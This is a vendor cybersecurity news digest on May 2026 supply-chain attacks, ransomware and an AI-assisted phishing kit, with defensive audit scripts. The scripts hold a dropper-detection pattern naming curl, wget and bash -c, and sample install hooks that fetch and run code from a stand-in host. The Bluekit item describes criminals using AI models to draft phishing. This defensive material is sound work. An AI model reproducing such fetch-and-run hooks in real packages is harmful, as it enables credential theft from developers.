Acronis
May 05, 2026

MSP cybersecurity news digest, May 5, 2026

SAP npm packages compromised in supply chain attack to steal developer and cloud credentials, GlassWorm campaign resurfaces via sleeper OpenVSX extensions that activate malicious payloads, and more. Here are the latest threats to MSP security.

Author: Acronis Threat Research Unit


Compromised PyPI package with over a million downloads distributed infostealer targeting developer secrets

A malicious elementary-data 0.23.3 release was published to PyPI and also propagated into a matching GitHub Container Registry image because the project's release workflow built the package and container image from the same compromised release path. The package is widely used in the dbt ecosystem and has more than 1.1 million monthly downloads.

The attacker abused a GitHub Actions script injection flaw by posting a malicious pull-request comment that executed attacker-controlled shell code inside the workflow. That exposed the workflow's GITHUB_TOKEN, allowing the attacker to forge a signed commit and trigger the project's legitimate publishing pipeline.
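The weakness described above is the classic GitHub Actions expression-injection pattern: untrusted event data (a comment body, an issue title, a branch name) interpolated with `${{ ... }}` directly into a `run:` script. The following audit script is an added example written for this digest, not code from the affected project or from Acronis; the sample workflows are constructed, and the list of untrusted contexts follows GitHub's own hardening guidance. It scans workflow text for untrusted contexts inside `run:` scripts and shows the accepted mitigation (pass the value through `env:` and quote it as a shell variable) beside the vulnerable form.

```python
"""Heuristic audit of GitHub Actions workflow files for untrusted event data
interpolated into `run:` scripts (expression injection)."""
import re

# Event fields GitHub documents as attacker-controllable.
UNTRUSTED_CONTEXTS = [
    r"github\.event\.issue\.title", r"github\.event\.issue\.body",
    r"github\.event\.pull_request\.title", r"github\.event\.pull_request\.body",
    r"github\.event\.comment\.body", r"github\.event\.review\.body",
    r"github\.event\.review_comment\.body",
    r"github\.event\.pages\.[^}\s]*\.page_name",
    r"github\.event\.commits\.[^}\s]*\.message",
    r"github\.event\.head_commit\.message",
    r"github\.event\.head_commit\.author\.(?:email|name)",
    r"github\.event\.commits\.[^}\s]*\.author\.(?:email|name)",
    r"github\.event\.pull_request\.head\.ref",
    r"github\.event\.pull_request\.head\.label",
    r"github\.event\.pull_request\.head\.repo\.default_branch",
    r"github\.head_ref",
]
EXPRESSION_RE = re.compile(r"\$\{\{(.*?)\}\}")
UNTRUSTED_RE = re.compile("|".join(UNTRUSTED_CONTEXTS))
RUN_KEY_RE = re.compile(r"^(\s*)(?:-\s+)?run:\s*(.*)$")


def _run_script_lines(workflow_text):
    """Yield (line_no, text) for every line that belongs to a `run:` script,
    handling both single-line values and `|` / `>` block scalars."""
    lines = workflow_text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_KEY_RE.match(lines[i])
        if not m:
            i += 1
            continue
        indent, value = len(m.group(1)), m.group(2).strip()
        if value and value[0] not in "|>":
            yield i + 1, value            # single-line script
            i += 1
            continue
        i += 1                             # block scalar: body is indented deeper than the key
        while i < len(lines) and (not lines[i].strip()
                                  or len(lines[i]) - len(lines[i].lstrip()) > indent):
            if lines[i].strip():
                yield i + 1, lines[i]
            i += 1


def find_injection_sinks(workflow_text):
    """Return (line_no, expression) for each untrusted context expanded
    inside a shell script. Values routed through `env:` are not reported,
    because the shell then receives them as data, not as script text."""
    findings = []
    for line_no, text in _run_script_lines(workflow_text):
        for match in EXPRESSION_RE.finditer(text):
            expr = match.group(1).strip()
            if UNTRUSTED_RE.search(expr):
                findings.append((line_no, expr))
    return findings


# Constructed samples, not the affected project's real workflow.
VULNERABLE_WORKFLOW = """\
on: issue_comment
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - name: Echo comment
        run: |
          echo "Comment was: ${{ github.event.comment.body }}"
"""

HARDENED_WORKFLOW = """\
on: issue_comment
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - name: Echo comment
        env:
          COMMENT_BODY: ${{ github.event.comment.body }}
        run: |
          echo "Comment was: $COMMENT_BODY"
"""

if __name__ == "__main__":
    print("vulnerable:", find_injection_sinks(VULNERABLE_WORKFLOW))
    print("hardened:  ", find_injection_sinks(HARDENED_WORKFLOW))
```

Run it over every file under `.github/workflows/`; any finding is a step where a contributor-controlled string becomes shell code. The fix shown in `HARDENED_WORKFLOW` is the one GitHub recommends: bind the expression to an environment variable and reference it as a quoted shell variable, so the value can never alter the script.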

The payload executed automatically through a Python .pth file and targeted developer secrets including SSH keys, Git credentials, AWS / GCP / Azure credentials, Kubernetes secrets, Docker configuration, CI secrets, environment files and cryptocurrency wallet data. This makes the incident a strong example of how one workflow weakness can become a software supply chain compromise.

SAP npm packages compromised in supply chain attack to steal developer and cloud credentials

Multiple official SAP npm packages were compromised in a suspected TeamPCP supply chain attack, affecting packages used with SAP's Cloud Application Programming Model and Cloud MTA development workflows. The compromised package versions were deprecated after discovery, but affected environments still required secret rotation and investigation.

The malicious packages included a preinstall script that launched a loader, downloaded the Bun JavaScript runtime from GitHub, and executed an obfuscated payload. The malware targeted npm and GitHub tokens, SSH keys, AWS / Azure / GCP credentials, Kubernetes secrets, CI / CD secrets and environment variables.

The attack also attempted to steal secrets directly from CI runner memory and upload encrypted data into public GitHub repositories under victim accounts. The malware contained self-propagation logic, meaning stolen npm or GitHub credentials could be used to compromise additional packages and repositories.
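Both the PyPI incident (payload run from a Python .pth file) and the SAP npm incident (payload launched from a preinstall script) rely on install-time execution hooks that need no action from the developer. The following audit script is an added example written for this digest, not code from Acronis or from the affected packages; the .pth text and package.json documents it scans are constructed samples. It flags every line a .pth file would execute (CPython runs only lines beginning with `import `) and every npm lifecycle hook a package declares, escalating commands that fetch remote files, evaluate inline code, or pull in a second runtime such as Bun.

```python
"""Audit install-time execution hooks: Python .pth files and npm lifecycle scripts."""
import json
import os
import re
import site

# --- Python .pth files -----------------------------------------------------
# Markers suggesting an `import` line carries a payload rather than a plain path
# hook (heuristic; legitimate .pth files normally hold one bare import).
PTH_CODE_MARKERS = (";", "exec(", "eval(", "base64", "subprocess", "os.system",
                    "urllib", "socket", "__import__")


def scan_pth_text(text):
    """Return (line_no, severity, line) for each line the interpreter would run.
    Only lines starting with 'import ' or 'import\\t' are executed; the rest of a
    .pth file is path entries and comments."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line.startswith(("import ", "import\t")):
            continue
        severity = "suspicious" if any(m in line for m in PTH_CODE_MARKERS) else "executes"
        findings.append((line_no, severity, line))
    return findings


def scan_site_packages(dirs=None):
    """Scan every .pth file in the given dirs (default: this interpreter's site dirs)."""
    if dirs is None:
        dirs = list(getattr(site, "getsitepackages", lambda: [])())
        dirs.append(site.getusersitepackages())
    report = {}
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if name.endswith(".pth"):
                path = os.path.join(d, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_pth_text(fh.read())
                if hits:
                    report[path] = hits
    return report


# --- npm lifecycle scripts -------------------------------------------------
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "preprepare", "prepare", "postprepare")
# Commands typical of a dropper rather than a build step.
DROPPER_RE = re.compile(
    r"\b(curl|wget|bun|node\s+-e|node\s+--eval|base64|eval|powershell|sh\s+-c|bash\s+-c)\b",
    re.IGNORECASE)


def audit_package_json(text):
    """Report every lifecycle hook in a package.json, in execution order,
    marking dropper-like commands for immediate attention."""
    scripts = json.loads(text).get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        flag = "dropper-like" if DROPPER_RE.search(cmd) else "review"
        findings.append({"hook": hook, "command": cmd, "flag": flag})
    return findings


# --- constructed samples (not from the compromised packages) ---------------
SAMPLE_PTH = """\
# constructed .pth sample
/opt/extra/site-path
import _editable_hook
import os; os.system("PLACEHOLDER_COMMAND")
"""

SUSPICIOUS_PACKAGE_JSON = json.dumps({
    "name": "constructed-example-pkg", "version": "1.0.0",
    "scripts": {"preinstall": "curl -sL https://example.invalid/bun-runtime.zip -o bun.zip && node loader.js",
                "build": "tsc -p ."}})

CLEAN_PACKAGE_JSON = json.dumps({
    "name": "constructed-clean-pkg", "version": "1.0.0",
    "scripts": {"postinstall": "node scripts/link-assets.js", "test": "jest"}})

if __name__ == "__main__":
    print(scan_pth_text(SAMPLE_PTH))
    print(audit_package_json(SUSPICIOUS_PACKAGE_JSON))
    print(scan_site_packages())
```

Two caveats worth pairing with the script: `python -S` skips site initialisation and therefore .pth processing, which is useful when triaging a suspect environment, and `ignore-scripts=true` in `.npmrc` (or `npm install --ignore-scripts`) prevents lifecycle hooks from running at all on CI runners, at the cost of breaking packages that genuinely need a build step.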

GlassWorm campaign resurfaces via sleeper OpenVSX extensions that activate malicious payloads

The GlassWorm campaign returned through 73 OpenVSX sleeper extensions that appeared benign when first uploaded and later turned malicious through updates or runtime payload retrieval. Six extensions had already been activated, while researchers assessed the rest as dormant or suspicious.

The malicious extensions cloned legitimate listings and used visual similarity to trick developers who might not check publisher names or unique identifiers closely. Some variants fetched a secondary VSIX package from GitHub, loaded platform-specific compiled modules, or used heavily obfuscated JavaScript to retrieve and install payloads at runtime.

Earlier GlassWorm activity targeted cryptocurrency wallets, credentials, access tokens, SSH keys and developer-environment data, and the latest wave shows a shift toward delayed activation to reduce early detection. This matters because IDE extensions sit inside trusted development workflows and can access high-value engineering environments.
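The clone technique above works because developers compare display names, not the `publisher.name` identifier that actually distinguishes a listing. The inventory script below is an added example written for this digest, not code from Acronis or from any extension researcher; the approved list and the sample manifests are constructed, and a team would substitute its own reviewed allowlist. It reads each installed extension's `package.json` and classifies it as approved, as a look-alike (same display name or package name as an approved extension but a different publisher), or as unreviewed.

```python
"""Inventory installed VS Code / OpenVSX extensions and flag look-alike listings."""
import json
import os

# Constructed allowlist of (publisher, name) -> displayName pairs the team has
# reviewed. Replace with your own; identifiers must match the marketplace listing.
APPROVED = {
    ("ms-python", "python"): "Python",
    ("esbenp", "prettier-vscode"): "Prettier - Code formatter",
}


def classify_extension(manifest, approved=APPROVED):
    """Classify one extension manifest (the dict from its package.json)."""
    publisher = (manifest.get("publisher") or "").strip().lower()
    name = (manifest.get("name") or "").strip().lower()
    display = (manifest.get("displayName") or name).strip().lower()
    if (publisher, name) in approved:
        return "approved"
    # Same display name or package name as an approved extension, but a
    # different publisher: the visual-clone pattern.
    for (ap, an), ad in approved.items():
        if display == ad.strip().lower() or name == an:
            return f"lookalike-of:{ap}.{an}"
    return "unreviewed"


def inventory(ext_root=None):
    """Classify every extension directory under the VS Code extensions folder."""
    ext_root = ext_root or os.path.expanduser("~/.vscode/extensions")
    results = {}
    if not os.path.isdir(ext_root):
        return results
    for entry in sorted(os.listdir(ext_root)):
        manifest_path = os.path.join(ext_root, entry, "package.json")
        if not os.path.isfile(manifest_path):
            continue
        try:
            with open(manifest_path, encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, json.JSONDecodeError):
            results[entry] = "unparseable"
            continue
        results[entry] = classify_extension(manifest)
    return results


# Constructed sample manifests: one genuine, one clone, one unrelated.
SAMPLE_MANIFESTS = [
    {"publisher": "ms-python", "name": "python", "displayName": "Python"},
    {"publisher": "py-tools-official", "name": "python", "displayName": "Python"},
    {"publisher": "someone", "name": "color-theme", "displayName": "My Theme"},
]

if __name__ == "__main__":
    for m in SAMPLE_MANIFESTS:
        print(f"{m['publisher']}.{m['name']}: {classify_extension(m)}")
    for entry, verdict in inventory().items():
        print(entry, verdict)
```

Anything reported as a look-alike deserves a side-by-side check of the publisher ID against the marketplace page; "unreviewed" entries are the queue for adding to or rejecting from the allowlist. Because GlassWorm's extensions turn malicious through later updates, the inventory is only useful when rerun after extension updates, not just at install time.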

VECT 2.0 mishandles encryption, causing permanent data loss for large files in ransomware incidents

Researchers warned that VECT 2.0 ransomware mishandles encryption nonces for larger files, causing much of the encrypted data to become permanently unrecoverable. Because the lost nonces are not transmitted to the attackers, even the ransomware operators would be unable to restore affected large files after payment.

The flaw affects files above a very small threshold, meaning routine enterprise data such as documents, spreadsheets, mailboxes, databases, VM disks and backups can be destroyed rather than recoverably encrypted. Researchers found the same destructive behavior across Windows, Linux and ESXi variants.

VECT operators had also discussed partnerships and supply chain targeting, including interest in exploiting victims of prior compromises, which makes the destructive encryption bug especially dangerous for organizations already exposed through dependency or infrastructure incidents.

New Bluekit service uses AI models to generate phishing campaign drafts and automate operations

Bluekit is a phishing kit with more than 40 templates targeting email accounts, cloud services, developer platforms and cryptocurrency services, including Outlook, Gmail, iCloud, GitHub and Ledger. Its operator panel combines domain setup, phishing page configuration and campaign management in a single interface.

The kit includes an AI Assistant panel supporting models such as Llama, GPT-4.1, Claude, Gemini, and DeepSeek to help generate campaign drafts. The AI output was described as an early campaign skeleton rather than a finished phishing flow, but it still shows how criminal tooling is starting to use AI to reduce operator effort.

Operators can configure phishing-page behavior, redirects, anti-analysis checks, VPN or proxy blocking, headless-browser filtering and victim-session monitoring. This makes the kit more operationally useful for criminals who want scalable phishing campaigns without building tooling from scratch.